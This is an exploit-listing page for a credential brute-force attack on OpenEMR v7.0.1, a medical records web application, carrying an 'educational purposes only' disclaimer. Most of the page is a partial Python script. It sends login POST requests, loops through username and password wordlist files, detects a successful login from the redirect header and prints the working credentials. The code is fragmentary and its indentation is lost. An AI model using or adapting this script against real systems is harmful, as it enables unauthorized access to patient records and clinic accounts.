Openemr v7.0.1 authentication credentials brute force Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-05-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Openemr v7.0.1 authentication credentials brute force is for educational purposes only and if it is used you will do on your own risk!
#Sending POST REQ
r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
#Printing Username:Password
process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))
#Conditional loops
if 'Location' in r.headers:
if "/interface/main/tabs/main.php" in r.headers['Location']:
print()
log.info(f'SUCCESS !!')
log.success(f"Use Credential -> {Username}:{Password}")
sys.exit(0)
#Reading User.txt & Pass.txt files
if Username_list:
userfile = open(Username_list).readlines()
for Username in userfile:
Username = Username.strip()
passfile = open(Password_list).readlines()
for Password in passfile:
Password = Password.strip()
login(Username,Password)
Openemr v7.0.1 authentication credentials brute force